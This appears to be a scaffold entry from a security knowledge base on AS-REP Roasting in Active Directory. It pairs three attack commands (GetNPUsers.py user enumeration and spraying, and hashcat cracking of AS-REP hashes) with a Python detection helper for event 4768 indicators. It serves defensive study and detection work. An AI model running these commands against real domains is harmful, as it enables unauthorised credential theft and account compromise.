AS-REP Roasting
Status: Scaffold — content in progress
ATT&CK: T1558.004 — Steal or Forge Kerberos Tickets: AS-REP Roasting
Platforms: Windows (Active Directory)
Severity: High
What It Exploits
When a user account has "Do not require Kerberos pre-authentication" enabled (UAC flag DONT_REQ_PREAUTH), the KDC returns an AS-REP containing a TGT without first verifying that the requester knows the password. Part of that AS-REP is encrypted with the user's long-term key, which is derived from the password, so the encrypted portion can be attacked offline.
Difference from Kerberoasting: No domain credentials required — can be done unauthenticated if you know the username.
Attack Flow
1. Enumerate accounts without pre-auth (requires domain auth):

```
GetNPUsers.py ITDR/ -usersfile users.txt -dc-ip 192.168.56.10
```

2. Or spray without authentication (need valid usernames):

```
GetNPUsers.py ITDR/ -no-pass -usersfile users.txt -dc-ip 192.168.56.10
```

3. Crack the AS-REP hash:

```
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
```
Behavioral Indicators
- 4768 events with Pre-Authentication Type = 0 (no pre-auth)
- 4768 failures for enumeration attempts
- Requests from unusual sources for accounts that don't normally log in from that location
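A small detection helper for the two 4768 indicators above, added here as an example (not part of the original note or any project). It assumes the 4768 events have already been parsed into dicts with the constructed field names shown; the status and pre-auth codes are the ones documented for the event.

```python
from collections import defaultdict

# Constructed sample of parsed Security event 4768 (Kerberos TGT requested) records.
# Field names are our own; the values follow the event's documented codes:
# pre_auth_type 0 = logon without pre-authentication, status 0x0 = success,
# 0x6 = client not found in Kerberos database, 0x19 = additional pre-authentication
# required, etype 0x17 = RC4-HMAC (what hashcat mode 18200 cracks), 0x12 = AES256.
EVENTS = [
    {"user": "svc_backup", "src_ip": "10.0.0.55", "pre_auth_type": 0, "status": "0x0",  "etype": "0x17"},
    {"user": "bob",        "src_ip": "10.0.0.55", "pre_auth_type": 0, "status": "0x19", "etype": "0x17"},
    {"user": "carol",      "src_ip": "10.0.0.55", "pre_auth_type": 0, "status": "0x6",  "etype": "0x17"},
    {"user": "dave",       "src_ip": "10.0.0.55", "pre_auth_type": 0, "status": "0x6",  "etype": "0x17"},
    {"user": "erin",       "src_ip": "10.0.0.55", "pre_auth_type": 0, "status": "0x19", "etype": "0x17"},
    # Baseline noise: a Windows client first sends an AS-REQ without pre-auth,
    # receives 0x19, then retries with pre-auth and succeeds.
    {"user": "alice",      "src_ip": "10.0.0.20", "pre_auth_type": 0, "status": "0x19", "etype": "0x12"},
    {"user": "alice",      "src_ip": "10.0.0.20", "pre_auth_type": 2, "status": "0x0",  "etype": "0x12"},
]

FAILURE_CODES = {"0x6", "0x19"}


def no_preauth_successes(events):
    """Indicator 1: a TGT was issued with Pre-Authentication Type 0.

    The AS-REP's encrypted part went to a requester who never proved the
    password, so it can be cracked offline. Every hit deserves review.
    """
    return [e for e in events if e["pre_auth_type"] == 0 and e["status"] == "0x0"]


def enumeration_sources(events, min_users=4):
    """Indicator 2: one source producing failed 4768s for many distinct usernames.

    A single 0x19 per user is normal Kerberos behaviour; the signal is the
    fan-out (many users, including unknown ones -> 0x6) from one address.
    """
    failed_users = defaultdict(set)
    for e in events:
        if e["status"] in FAILURE_CODES:
            failed_users[e["src_ip"]].add(e["user"])
    return {ip: sorted(users) for ip, users in failed_users.items() if len(users) >= min_users}


if __name__ == "__main__":
    for e in no_preauth_successes(EVENTS):
        print(f"no-preauth TGT issued: user={e['user']} src={e['src_ip']} etype={e['etype']}")
    for ip, users in enumeration_sources(EVENTS).items():
        print(f"possible username spray from {ip}: {', '.join(users)}")
```

In production the `min_users` threshold should be tuned against the baseline of 0x19 failures your DCs normally emit.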
CTI Examples
Used as a standard technique in initial credential access, especially when combined with username enumeration from other sources (LinkedIn, email harvesting, previous breach data).
Evidence label: Reported | Confidence: Medium
Cross-Links
| Topic | Link |
|---|---|
| Kerberos Protocol | kerberos |
| Detection | detect-asrep-roasting |